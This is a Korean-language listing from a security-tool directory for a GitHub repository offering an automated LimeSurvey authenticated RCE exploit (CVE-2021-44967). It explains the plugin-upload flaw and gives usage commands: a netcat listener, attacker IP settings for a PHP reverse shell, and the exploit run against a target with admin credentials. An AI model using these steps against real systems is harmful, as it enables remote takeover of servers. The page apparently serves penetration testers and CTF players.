Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 Limesurvey용 자동화된 RCE 익스플로잇 (CVE-2021-44967). 권한 상승을 위한 최적화된 익스플로잇 체인. 🚀 | Kitploit
도구/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Limesurvey용 자동화된 RCE 익스플로잇 (CVE-2021-44967). 권한 상승을 위한 최적화된 익스플로잇 체인. 🚀

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
2개월 전아직 검토되지 않음

🚀 LimeSurvey RCE (CVE-2021-44967) - 인증된 원격 코드 실행

이 저장소는 LimeSurvey의 인증된 원격 코드 실행 취약점인 CVE-2021-44967에 대한 기능적 익스플로잇을 포함합니다.

🎯 호환성

다음에서 테스트 및 작동 확인됨:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 취약점 개요

이 취약점은 관리 권한이 있는 인증된 사용자가 악성 플러그인을 업로드할 수 있게 합니다. LimeSurvey가 플러그인 ZIP의 내용을 엄격하게 검증하지 않거나 플러그인 디렉토리에서 PHP 파일의 실행을 방지하지 않기 때문에, 공격자는 업로드된 셸에 직접 접근하여 RCE를 달성할 수 있습니다.

✨ 기능

  • 🤖 자동 익스플로잇: 자동으로 로그인, CSRF 토큰 처리, 플러그인 업로드, 설치 및 활성화를 수행합니다.
  • ✅ 향상된 호환성: LimeSurvey 버전 3.0부터 6.0까지의 호환성을 위해 config.xml이 업데이트되었습니다.
  • 💣 유연한 페이로드: 강력한 PHP 리버스 셸을 포함합니다.

🛠️ 사용법

1️⃣ 리스너 준비

머신에서 netcat 리스너를 시작하세요:

root@kitploit:~
nc -lvnp 443

2️⃣ 리버스 셸 구성

php-rev.php를 편집하고 로컬 IP와 포트를 설정하세요:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ 익스플로잇 실행

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

예시:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 저장소 구조

  • 🐍 exploit.py: 메인 자동화 스크립트.
  • 🐘 php-rev.php: PHP 리버스 셸 페이로드.
  • ⚙️ config.xml: 필수 LimeSurvey 플러그인 구성 파일.

⚠️ 면책 조항

이 도구는 교육 목적과 승인된 보안 테스트 전용입니다. 통제되고 합법적인 환경(예: CTF, 실험실 환경, 또는 승인된 계약)에서만 사용하도록 엄격히 의도되었습니다. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 책임감 있게 사용하고, 명시적 허가를 받은 시스템에서만 테스트하십시오.

도구 다운로드